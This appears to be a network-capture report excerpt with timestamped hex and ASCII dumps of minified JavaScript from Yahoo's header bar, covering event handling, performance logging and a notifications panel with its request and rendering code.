                                                                                                                                                                        2023-06-02 11:13:21 UTC400INData Raw: 6f 2c 73 2c 72 29 7b 76 61 72 20 61 3d 74 3f 74 2b 65 3a 65 3b 69 66 28 21 74 68 69 73 2e 5f 65 76 65 6e 74 73 5b 61 5d 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 63 2c 6c 2c 64 3d 74 68 69 73 2e 5f 65 76 65 6e 74 73 5b 61 5d 2c 75 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 69 66 28 64 2e 66 6e 29 7b 73 77 69 74 63 68 28 64 2e 6f 6e 63 65 26 26 74 68 69 73 2e 72 65 6d 6f 76 65 4c 69 73 74 65 6e 65 72 28 65 2c 64 2e 66 6e 2c 76 6f 69 64 20 30 2c 21 30 29 2c 75 29 7b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 64 2e 66 6e 2e 63 61 6c 6c 28 64 2e 63 6f 6e 74 65 78 74 29 2c 21 30 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 64 2e 66 6e 2e 63 61 6c 6c 28 64 2e 63 6f 6e 74 65 78 74 2c 6e 29 2c 21 30 3b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 20 64 2e 66
                                                                                                                                                                        Data Ascii: o,s,r){var a=t?t+e:e;if(!this._events[a])return!1;var c,l,d=this._events[a],u=arguments.length;if(d.fn){switch(d.once&&this.removeListener(e,d.fn,void 0,!0),u){case 1:return d.fn.call(d.context),!0;case 2:return d.fn.call(d.context,n),!0;case 3:return d.f
                                                                                                                                                                        2023-06-02 11:13:21 UTC401INData Raw: 68 3f 74 68 69 73 2e 5f 65 76 65 6e 74 73 5b 73 5d 3d 31 3d 3d 3d 6c 2e 6c 65 6e 67 74 68 3f 6c 5b 30 5d 3a 6c 3a 72 28 74 68 69 73 2c 73 29 7d 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6d 6f 76 65 41 6c 6c 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3b 72 65 74 75 72 6e 20 65 3f 28 6e 3d 74 3f 74 2b 65 3a 65 2c 74 68 69 73 2e 5f 65 76 65 6e 74 73 5b 6e 5d 26 26 72 28 74 68 69 73 2c 6e 29 29 3a 28 74 68 69 73 2e 5f 65 76 65 6e 74 73 3d 6e 65 77 20 69 2c 74 68 69 73 2e 5f 65 76 65 6e 74 73 43 6f 75 6e 74 3d 30 29 2c 74 68 69 73 7d 2c 61 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 66 66 3d 61 2e 70 72 6f 74 6f 74 79 70 65 2e 72 65 6d 6f 76 65 4c 69 73 74 65 6e 65 72 2c 61 2e 70 72 6f 74 6f
                                                                                                                                                                        Data Ascii: h?this._events[s]=1===l.length?l[0]:l:r(this,s)}return this},a.prototype.removeAllListeners=function(e){var n;return e?(n=t?t+e:e,this._events[n]&&r(this,n)):(this._events=new i,this._eventsCount=0),this},a.prototype.off=a.prototype.removeListener,a.proto
                                                                                                                                                                        2023-06-02 11:13:21 UTC402INData Raw: 6f 6e 28 65 2c 6e 29 7b 67 65 74 50 65 72 66 6f 72 6d 61 6e 63 65 4d 65 74 72 69 63 73 28 29 5b 22 22 2e 63 6f 6e 63 61 74 28 65 2e 6e 61 6d 65 2c 22 5f 22 29 2e 63 6f 6e 63 61 74 28 6e 29 5d 3d 65 2e 64 75 72 61 74 69 6f 6e 2c 6c 6f 67 50 65 72 66 6f 72 6d 61 6e 63 65 28 65 29 7d 29 29 7d 7d 7d 2c 72 65 67 69 73 74 65 72 50 61 69 6e 74 4f 62 73 65 72 76 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 50 65 72 66 6f 72 6d 61 6e 63 65 4f 62 73 65 72 76 65 72 22 69 6e 20 77 69 6e 64 6f 77 29 74 72 79 7b 6e 65 77 20 50 65 72 66 6f 72 6d 61 6e 63 65 4f 62 73 65 72 76 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 67 65 74 45 6e 74 72 69 65 73 28 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 67 65 74 50 65 72 66 6f 72
                                                                                                                                                                        Data Ascii: on(e,n){getPerformanceMetrics()["".concat(e.name,"_").concat(n)]=e.duration,logPerformance(e)}))}}},registerPaintObserver=function(){if("PerformanceObserver"in window)try{new PerformanceObserver((function(e){e.getEntries().forEach((function(e,n){getPerfor
                                                                                                                                                                        2023-06-02 11:13:21 UTC403INData Raw: 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 73 26 26 28 73 3d 30 2c 61 5b 30 5d 26 26 28 72 3d 30 29 29 2c 72 3b 29 74 72 79 7b 69 66 28 74 3d 31 2c 69 26 26 28 6f 3d 32 26 61 5b 30 5d 3f 69 2e 72 65 74 75 72 6e 3a 61 5b 30 5d 3f 69 2e 74 68 72 6f 77 7c 7c 28 28 6f 3d 69 2e 72 65 74 75 72 6e 29 26 26 6f 2e 63 61 6c 6c 28 69 29 2c 30 29 3a 69 2e 6e 65 78 74 29 26 26 21 28 6f 3d 6f 2e 63 61 6c 6c 28 69 2c 61 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 6f 3b 73 77 69 74 63 68 28 69 3d 30 2c 6f 26 26 28 61 3d 5b 32 26 61 5b 30 5d 2c 6f 2e 76 61 6c 75 65 5d 29 2c 61 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 6f 3d 61 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 3a 72 65 74 75
                                                                                                                                                                        Data Ascii: nerator is already executing.");for(;s&&(s=0,a[0]&&(r=0)),r;)try{if(t=1,i&&(o=2&a[0]?i.return:a[0]?i.throw||((o=i.return)&&o.call(i),0):i.next)&&!(o=o.call(i,a[1])).done)return o;switch(i=0,o&&(a=[2&a[0],o.value]),a[0]){case 0:case 1:o=a;break;case 4:retu
                                                                                                                                                                        2023-06-02 11:13:21 UTC405INData Raw: 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 74 68 69 73 2e 74 72 69 67 67 65 72 45 76 65 6e 74 3d 74 72 69 67 67 65 72 45 76 65 6e 74 2c 74 68 69 73 2e 6c 6f 67 45 72 72 6f 72 3d 6c 6f 67 45 72 72 6f 72 2c 74 68 69 73 2e 6c 6f 67 50 65 72 66 6f 72 6d 61 6e 63 65 3d 6c 6f 67 50 65 72 66 6f 72 6d 61 6e 63 65 2c 74 68 69 73 2e 67 65 74 43 6f 6e 66 69 67 3d 67 65 74 43 6f 6e 66 69 67 2c 74 68 69 73 2e 67 65 74 50 65 72 66 6f 72 6d 61 6e 63 65 4d 65 74 72 69 63 73 3d 67 65 74 50 65 72 66 6f 72 6d 61 6e 63 65 4d 65 74 72 69 63 73 2c 74 68 69 73 2e 6d 6f 64 75 6c 65 49 64 3d 65 2c 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 2c 74 68 69 73 2e 79 62 61 72 4c 69 73 74 65 6e 65 72 73 3d 5b 5d 2c 74 68 69 73 2e 64 65 73 74 72 6f 79 46 6e 73 3d 5b 5d 7d 72 65 74
                                                                                                                                                                        Data Ascii: function e(e){this.triggerEvent=triggerEvent,this.logError=logError,this.logPerformance=logPerformance,this.getConfig=getConfig,this.getPerformanceMetrics=getPerformanceMetrics,this.moduleId=e,this.listeners=[],this.ybarListeners=[],this.destroyFns=[]}ret
                                                                                                                                                                        2023-06-02 11:13:21 UTC406INData Raw: 3d 65 2c 74 68 69 73 2e 69 6e 69 74 46 6e 3d 6e 2c 74 68 69 73 2e 79 62 61 72 41 70 69 3d 6e 65 77 20 59 62 61 72 4d 6f 64 75 6c 65 41 70 69 28 74 68 69 73 2e 6e 61 6d 65 29 2c 74 68 69 73 2e 73 74 61 74 65 3d 4d 6f 64 75 6c 65 4c 69 66 65 63 79 63 6c 65 2e 43 52 45 41 54 45 44 7d 72 65 74 75 72 6e 20 65 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 69 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 74 61 74 65 21 3d 3d 4d 6f 64 75 6c 65 4c 69 66 65 63 79 63 6c 65 2e 49 4e 49 54 49 41 4c 49 5a 45 44 26 26 28 74 68 69 73 2e 69 6e 69 74 46 6e 28 74 68 69 73 2e 79 62 61 72 41 70 69 2c 64 6f 63 75 6d 65 6e 74 2c 77 69 6e 64 6f 77 29 2c 74 68 69 73 2e 73 74 61 74 65 3d 4d 6f 64 75 6c 65 4c 69 66 65 63 79 63 6c 65 2e 49 4e 49 54 49 41 4c 49 5a 45 44 29 7d 2c
                                                                                                                                                                        Data Ascii: =e,this.initFn=n,this.ybarApi=new YbarModuleApi(this.name),this.state=ModuleLifecycle.CREATED}return e.prototype.init=function(){this.state!==ModuleLifecycle.INITIALIZED&&(this.initFn(this.ybarApi,document,window),this.state=ModuleLifecycle.INITIALIZED)},
                                                                                                                                                                        2023-06-02 11:13:21 UTC407INData Raw: 65 2e 69 73 52 4d 50 3b 69 66 28 6e 29 7b 76 61 72 20 69 3d 6e 2e 73 70 6c 69 74 28 22 3f 22 29 2c 6f 3d 7b 70 61 74 68 3a 69 5b 30 5d 2c 71 75 65 72 79 50 61 72 61 6d 73 3a 69 5b 31 5d 3f 69 5b 31 5d 2e 73 70 6c 69 74 28 22 26 22 29 3a 5b 5d 7d 3b 69 3d 6f 2e 70 61 74 68 2e 73 70 6c 69 74 28 22 3b 22 29 2c 6f 2e 70 61 74 68 3d 69 5b 30 5d 2c 6f 2e 6d 61 74 72 69 78 50 61 72 61 6d 73 3d 69 2e 73 6c 69 63 65 28 31 29 3b 76 61 72 20 73 3d 65 2e 71 75 65 72 79 50 61 72 61 6d 73 2c 72 3d 65 2e 6d 61 74 72 69 78 50 61 72 61 6d 73 3b 72 26 26 21 74 26 26 4f 62 6a 65 63 74 2e 6b 65 79 73 28 72 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 2e 6d 61 74 72 69 78 50 61 72 61 6d 73 2e 70 75 73 68 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f
                                                                                                                                                                        Data Ascii: e.isRMP;if(n){var i=n.split("?"),o={path:i[0],queryParams:i[1]?i[1].split("&"):[]};i=o.path.split(";"),o.path=i[0],o.matrixParams=i.slice(1);var s=e.queryParams,r=e.matrixParams;r&&!t&&Object.keys(r).forEach((function(e){o.matrixParams.push(encodeURICompo
                                                                                                                                                                        2023-06-02 11:13:21 UTC408INData Raw: 6e 64 52 65 71 75 65 73 74 28 73 2c 69 2c 74 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 73 65 6e 64 52 65 71 75 65 73 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 69 3d 74 68 69 73 3b 65 3d 65 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 69 2e 5f 63 6f 6e 66 69 67 2e 73 65 72 76 69 63 65 2c 73 3d 31 65 33 2a 6f 2e 61 74 74 65 6d 70 74 44 65 6c 61 79 2c 72 3d 65 2c 61 3d 72 2e 75 72 6c 2c 63 3d 72 2e 62 6f 64 79 2c 6c 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 3b 6c 2e 6f 70 65 6e 28 65 2e 6d 65 74 68 6f 64 2c 61 29 2c 6c 2e 72 65 73 70 6f 6e 73 65 54 79 70 65 3d 6f 2e 72 65 73 70 6f 6e 73 65 54 79 70 65 2c 6c 2e 74 69 6d 65 6f 75 74 3d 6f 2e 74 69 6d 65 6f 75 74 3b 76 61 72 20 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3e
                                                                                                                                                                        Data Ascii: ndRequest(s,i,t)}},{key:"_sendRequest",value:function(e,n,t){var i=this;e=e||{};var o=i._config.service,s=1e3*o.attemptDelay,r=e,a=r.url,c=r.body,l=new XMLHttpRequest;l.open(e.method,a),l.responseType=o.responseType,l.timeout=o.timeout;var d=function(){n>
                                                                                                                                                                        2023-06-02 11:13:21 UTC410INData Raw: 6e 74 26 26 70 61 72 73 65 49 6e 74 28 65 2e 63 6f 75 6e 74 2c 31 30 29 7c 7c 30 7d 7d 2c 7b 6b 65 79 3a 22 72 65 73 65 74 4e 65 77 43 6f 75 6e 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 30 21 3d 3d 74 68 69 73 2e 5f 6e 65 77 43 6f 75 6e 74 26 26 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 73 65 72 76 69 63 65 2e 72 65 73 65 74 55 72 6c 29 7b 76 61 72 20 65 3d 7b 75 72 6c 3a 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 73 65 72 76 69 63 65 2e 72 65 73 65 74 55 72 6c 7d 3b 74 68 69 73 2e 5f 72 65 71 75 65 73 74 2e 72 65 61 64 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 7d 29 29 7d 74 68 69 73 2e 5f 6e 65 77 43 6f 75 6e 74 3d 30 7d 7d 2c 7b 6b 65 79 3a 22 5f 72 65 71 75 65 73 74 4e 6f 74 69 66 69 63 61 74 69 6f 6e 73 22 2c 76 61 6c
                                                                                                                                                                        Data Ascii: nt&&parseInt(e.count,10)||0}},{key:"resetNewCount",value:function(){if(0!==this._newCount&&this._config.service.resetUrl){var e={url:this._config.service.resetUrl};this._request.read(e,(function(e,n){}))}this._newCount=0}},{key:"_requestNotifications",val
                                                                                                                                                                        2023-06-02 11:13:21 UTC411INData Raw: 4c 69 6e 6b 7d 22 20 64 61 74 61 2d 79 6c 6b 3d 22 73 65 63 3a 68 64 3b 73 75 62 73 65 63 3a 6e 6f 74 69 66 69 63 61 74 69 6f 6e 73 2d 76 69 65 77 61 6c 6c 3b 73 6c 6b 3a 7b 6e 6f 74 69 66 69 63 61 74 69 6f 6e 43 65 6e 74 65 72 4e 61 76 4d 73 67 7d 3b 22 3e 7b 6e 6f 74 69 66 69 63 61 74 69 6f 6e 43 65 6e 74 65 72 4e 61 76 4d 73 67 7d 3c 2f 61 3e 3c 2f 64 69 76 3e 27 2c 70 61 6e 65 6c 45 6d 70 74 79 54 65 6d 70 6c 61 74 65 3d 27 3c 6c 69 20 63 6c 61 73 73 3d 22 79 6e 73 2d 63 6f 6e 74 61 69 6e 65 72 20 79 6e 73 2d 65 6d 70 74 79 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 79 6e 73 2d 63 6f 6e 74 65 6e 74 22 3e 7b 65 6d 70 74 79 50 61 6e 65 6c 4d 73 67 7d 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 27 2c 70 61 6e 65 6c 45 72 72 6f 72 54 65 6d 70 6c 61 74 65 3d 27 3c 64
                                                                                                                                                                        Data Ascii: Link}" data-ylk="sec:hd;subsec:notifications-viewall;slk:{notificationCenterNavMsg};">{notificationCenterNavMsg}</a></div>',panelEmptyTemplate='<li class="yns-container yns-empty"><div class="yns-content">{emptyPanelMsg}</div></li>',panelErrorTemplate='<d
                                                                                                                                                                        2023-06-02 11:13:21 UTC412INData Raw: 2e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 2e 70 65 72 6d 69 73 73 69 6f 6e 2c 6f 3d 74 2e 70 72 6f 6d 6f 73 2e 62 79 70 61 73 73 45 6c 69 67 69 62 6c 65 43 6c 61 73 73 43 68 65 63 6b 7c 7c 68 61 73 43 6c 61 73 73 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2c 74 2e 70 72 6f 6d 6f 73 2e 65 6c 69 67 69 62 6c 65 42 6f 64 79 43 6c 61 73 73 29 29 3b 76 61 72 20 73 3d 74 2e 70 72 6f 6d 6f 73 2e 65 6e 61 62 6c 65 4e 6f 74 69 66 4f 6e 62 6f 61 72 64 26 26 69 26 26 6f 3f 6e 6f 74 69 66 4f 6e 62 6f 61 72 64 50 72 6f 6d 6f 54 65 6d 70 6c 61 74 65 3a 22 22 3b 69 66 28 73 29 7b 76 61 72 20 72 3d 74 2e 70 72 6f 6d 6f 73 2e 73 68 6f 77 59 61 68 6f 6f 4c 6f 67 6f 3f 22 22 3a 22 79 6e 73 2d 6e 6f 2d 6c 6f 67 6f 22 3b 73 3d 73 2e 72 65 70 6c 61 63 65 28 22 7b 6e 6f 74 69 66 4f
                                                                                                                                                                        Data Ascii: .Notification.permission,o=t.promos.bypassEligibleClassCheck||hasClass(document.body,t.promos.eligibleBodyClass));var s=t.promos.enableNotifOnboard&&i&&o?notifOnboardPromoTemplate:"";if(s){var r=t.promos.showYahooLogo?"":"yns-no-logo";s=s.replace("{notifO
                                                                                                                                                                        2023-06-02 11:13:21 UTC414INData Raw: 65 50 61 6e 65 6c 4d 61 72 6b 75 70 28 69 2c 72 29 2c 6f 2e 69 6e 6e 65 72 48 54 4d 4c 3d 73 3b 62 72 65 61 6b 3b 63 61 73 65 20 45 52 52 4f 52 5f 50 41 4e 45 4c 3a 73 3d 28 69 3d 70 61 6e 65 6c 45 72 72 6f 72 54 65 6d 70 6c 61 74 65 29 2e 72 65 70 6c 61 63 65 28 22 7b 65 72 72 6f 72 4d 73 67 7d 22 2c 74 2e 5f 63 6f 6e 66 69 67 2e 70 61 6e 65 6c 2e 65 72 72 6f 72 4d 73 67 29 2c 6f 2e 69 6e 6e 65 72 48 54 4d 4c 3d 73 7d 6e 26 26 6e 28 29 7d 65 6c 73 65 20 6e 26 26 6e 28 6e 65 77 20 45 72 72 6f 72 28 22 4e 6f 20 70 61 6e 65 6c 20 70 61 72 65 6e 74 22 29 29 7d 7d 2c 7b 6b 65 79 3a 22 63 72 65 61 74 65 50 61 6e 65 6c 50 61 72 65 6e 74 4e 6f 64 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 28 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 61
                                                                                                                                                                        Data Ascii: ePanelMarkup(i,r),o.innerHTML=s;break;case ERROR_PANEL:s=(i=panelErrorTemplate).replace("{errorMsg}",t._config.panel.errorMsg),o.innerHTML=s}n&&n()}else n&&n(new Error("No panel parent"))}},{key:"createPanelParentNode",value:function(e){e&&(e.innerHTML=pa
                                                                                                                                                                        2023-06-02 11:13:21 UTC415INData Raw: 65 77 2e 63 72 65 61 74 65 50 61 6e 65 6c 50 61 72 65 6e 74 4e 6f 64 65 28 74 68 69 73 2e 5f 70 61 6e 65 6c 50 61 72 65 6e 74 4e 6f 64 65 29 2c 74 68 69 73 2e 5f 6e 6f 74 69 66 50 61 6e 65 6c 4e 6f 64 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 63 6f 6e 73 74 61 6e 74 73 2e 70 61 6e 65 6c 4e 6f 64 65 49 64 29 7d 7d 2c 7b 6b 65 79 3a 22 72 65 66 72 65 73 68 50 61 6e 65 6c 4e 6f 64 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 61 64 64 43 6c 61 73 73 28 74 2e 5f 6e 6f 74 69 66 50 61 6e 65 6c 4e 6f 64 65 2c 63 6f 6e 73 74 61 6e 74 73 2e 70 61 6e 65 6c 4c 6f 61 64 69 6e 67 29 2c 74 2e 5f 73 74 6f 72 65 2e 66 65 74 63 68 4e 6f 74 69 66 69 63 61 74 69 6f 6e 73 28 65 2c 28
                                                                                                                                                                        Data Ascii: ew.createPanelParentNode(this._panelParentNode),this._notifPanelNode=document.getElementById(constants.panelNodeId)}},{key:"refreshPanelNode",value:function(e,n){var t=this;addClass(t._notifPanelNode,constants.panelLoading),t._store.fetchNotifications(e,(
                                                                                                                                                                        2023-06-02 11:13:21 UTC416INData Raw: 69 67 69 62 6c 65 42 6f 64 79 43 6c 61 73 73 3a 22 64 69 73 70 6c 61 79 2d 70 75 73 68 2d 70 72 6f 6d 6f 73 22 2c 65 6e 61 62 6c 65 4e 6f 74 69 66 4f 6e 62 6f 61 72 64 3a 21 30 2c 62 79 70 61 73 73 45 6c 69 67 69 62 6c 65 43 6c 61 73 73 43 68 65 63 6b 3a 21 31 2c 6e 6f 74 69 66 4f 6e 62 6f 61 72 64 42 74 6e 4c 61 62 65 6c 3a 22 4e 6f 74 69 66 79 20 4d 65 22 2c 6e 6f 74 69 66 4f 6e 62 6f 61 72 64 4d 73 67 3a 22 47 65 74 20 61 6c 65 72 74 73 20 66 6f 72 20 62 72 65 61 6b 69 6e 67 20 6e 65 77 73 20 61 6e 64 20 74 6f 70 20 73 74 6f 72 69 65 73 22 2c 70 72 6f 6d 6f 4c 6f 67 6f 3a 22 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 63 76 2f 61 70 69 76 32 2f 61 65 2f 6e 65 77 73 2f 63 69 72 63 6c 65 5f 62 65 6c 6c 2e 70 6e 67 22 2c 73 68 6f 77 59 61 68
                                                                                                                                                                        Data Ascii: igibleBodyClass:"display-push-promos",enableNotifOnboard:!0,bypassEligibleClassCheck:!1,notifOnboardBtnLabel:"Notify Me",notifOnboardMsg:"Get alerts for breaking news and top stories",promoLogo:"https://s.yimg.com/cv/apiv2/ae/news/circle_bell.png",showYah
                                                                                                                                                                        2023-06-02 11:13:21 UTC417INData Raw: 6f 62 6a 65 63 74 41 73 73 69 67 6e 28 6e 2c 63 6f 6e 66 69 67 29 2c 6e 29 69 66 28 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 74 29 29 7b 76 61 72 20 69 3d 6e 5b 74 5d 2c 6f 3d 65 5b 74 5d 3b 22 6f 62 6a 65 63 74 22 3d 3d 3d 28 76 6f 69 64 20 30 3d 3d 3d 69 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 5f 74 79 70 65 6f 66 28 69 29 29 3f 6f 62 6a 65 63 74 41 73 73 69 67 6e 28 69 2c 6f 29 3a 6e 5b 74 5d 3d 65 5b 74 5d 7d 72 65 74 75 72 6e 20 6e 7d 7d 2c 7b 6b 65 79 3a 22 5f 76 61 6c 69 64 61 74 65 52 65 71 75 69 72 65 64 43 6f 6e 66 69 67 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 63 6f 6e 66 69 67 3b 72 65 74 75 72 6e 21 28 21 65 2e 70 61 6e 65 6c 2e 70 61 72 65 6e 74 53 65 6c 65 63 74 6f 72 7c 7c 21 65
                                                                                                                                                                        Data Ascii: objectAssign(n,config),n)if(n.hasOwnProperty(t)){var i=n[t],o=e[t];"object"===(void 0===i?"undefined":_typeof(i))?objectAssign(i,o):n[t]=e[t]}return n}},{key:"_validateRequiredConfigs",value:function(){var e=this.config;return!(!e.panel.parentSelector||!e
                                                                                                                                                                        2023-06-02 11:13:21 UTC419INData Raw: 77 2e 41 66 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 63 6f 6e 74 65 78 74 29 7c 7c 7b 7d 3b 72 65 74 75 72 6e 20 73 2e 72 65 67 69 6f 6e 26 26 73 2e 6c 61 6e 67 26 26 28 6f 2e 6c 61 6e 67 3d 73 2e 6c 61 6e 67 2c 6f 2e 72 65 67 69 6f 6e 3d 73 2e 72 65 67 69 6f 6e 29 2c 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 74 68 69 73 2e 70 61 72 74 6e 65 72 43 6c 61 73 73 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 6c 65 6e 67 74 68 29 26 26 28 6f 2e 70 61 72 74 6e 65 72 3d 74 68 69 73 2e 70 61 72 74 6e 65 72 43 6c 61 73 73 65 73 5b 31 5d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 2e 63 6c 69 65 6e 74 2e 68 65 6c 70 65 72 73 2e 72 65 66 72 65 73 68 50 61 6e 65 6c 4e 6f 64
                                                                                                                                                                        Data Ascii: w.Af)||void 0===n?void 0:n.context)||{};return s.region&&s.lang&&(o.lang=s.lang,o.region=s.region),(null===(t=this.partnerClasses)||void 0===t?void 0:t.length)&&(o.partner=this.partnerClasses[1]),new Promise((function(e,n){i.client.helpers.refreshPanelNod
                                                                                                                                                                        2023-06-02 11:13:21 UTC420INData Raw: 3d 74 68 69 73 2e 6d 65 72 67 65 43 6f 6e 66 69 67 73 28 73 2c 63 29 3b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 74 68 69 73 2e 70 61 72 74 6e 65 72 43 6c 61 73 73 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 6c 65 6e 67 74 68 29 26 26 22 79 61 68 6f 6f 22 21 3d 3d 28 6e 75 6c 6c 3d 3d 3d 28 69 3d 74 68 69 73 2e 70 61 72 74 6e 65 72 43 6c 61 73 73 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 5b 31 5d 29 26 26 28 6e 75 6c 6c 3d 3d 3d 28 6f 3d 64 2e 70 72 6f 6d 6f 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 54 6f 70 69 63 29 26 26 64 65 6c 65 74 65 20 64 2e 70 72 6f 6d 6f 73 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 54 6f 70 69 63
                                                                                                                                                                        Data Ascii: =this.mergeConfigs(s,c);return(null===(t=this.partnerClasses)||void 0===t?void 0:t.length)&&"yahoo"!==(null===(i=this.partnerClasses)||void 0===i?void 0:i[1])&&(null===(o=d.promos)||void 0===o?void 0:o.subscriptionTopic)&&delete d.promos.subscriptionTopic
                                                                                                                                                                        2023-06-02 11:13:21 UTC421INData Raw: 62 61 72 43 6f 6e 74 61 69 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 5f 79 62 61 72 43 6f 6e 74 61 69 6e 65 72 26 26 28 5f 79 62 61 72 43 6f 6e 74 61 69 6e 65 72 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 79 62 61 72 22 29 29 2c 5f 79 62 61 72 43 6f 6e 74 61 69 6e 65 72 7d 2c 67 65 74 52 61 70 69 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 30 2c 6e 3d 77 69 6e 64 6f 77 2e 59 41 48 4f 4f 3b 69 66 28 79 62 61 72 52 61 70 69 64 29 72 65 74 75 72 6e 20 79 62 61 72 52 61 70 69 64 3b 69 66 28 6e 29 69 66 28 6e 2e 69 31 33 6e 29 69 66 28 6e 2e 69 31 33 6e 2e 5f 5f 52 41 50 49 44 5f 49 4e 53 54 41 4e 43 45 53 5f 5f 29 69 66 28 6e 2e 69 31 33 6e 2e 5f 5f 52 41 50 49 44 5f
                                                                                                                                                                        Data Ascii: barContainer=function(){return null===_ybarContainer&&(_ybarContainer=document.getElementById("ybar")),_ybarContainer},getRapid=function(){var e=0,n=window.YAHOO;if(ybarRapid)return ybarRapid;if(n)if(n.i13n)if(n.i13n.__RAPID_INSTANCES__)if(n.i13n.__RAPID_
                                                                                                                                                                        2023-06-02 11:13:21 UTC421INData Raw: 65 6e 67 74 68 3c 31 29 79 62 61 72 52 61 70 69 64 45 72 72 4d 73 67 3d 22 59 42 41 52 3a 20 6e 6f 20 69 6e 73 74 61 6e 63 65 73 20 6f 66 20 72 61 70 69 64 20 66 6f 75 6e 64 21 22 3b 65 6c 73 65 7b 76 61 72 20 74 3d 66 69 6e 64 52 61 70 69 64 57 69 74 68 53 70 61 63 65 69 64 28 6e 2e 69 31 33 6e 2e 5f 5f 52 41 50 49 44 5f 49 4e 53 54 41 4e 43 45 53 5f 5f 29 3b 69 66 28 74 29 7b 79 62 61 72 52 61 70 69 64 3d 74 2c 79 62 61 72 52 61 70 69 64 45 72 72 4d 73 67 3d 22 22 2c 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 79 62 61 72 52 61 70 69 64 49 6e 74 65 72 76 61 6c 29 2c 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 62 65 66 6f 72 65 75 6e 6c 6f 61 64 22 2c 6c 6f 67 52 61 70 69 64 45 72 72 6f 72 29 3b 76 61 72 20 69 3d 7b
                                                                                                                                                                        Data Ascii: ength<1)ybarRapidErrMsg="YBAR: no instances of rapid found!";else{var t=findRapidWithSpaceid(n.i13n.__RAPID_INSTANCES__);if(t){ybarRapid=t,ybarRapidErrMsg="",clearInterval(ybarRapidInterval),window.removeEventListener("beforeunload",logRapidError);var i={
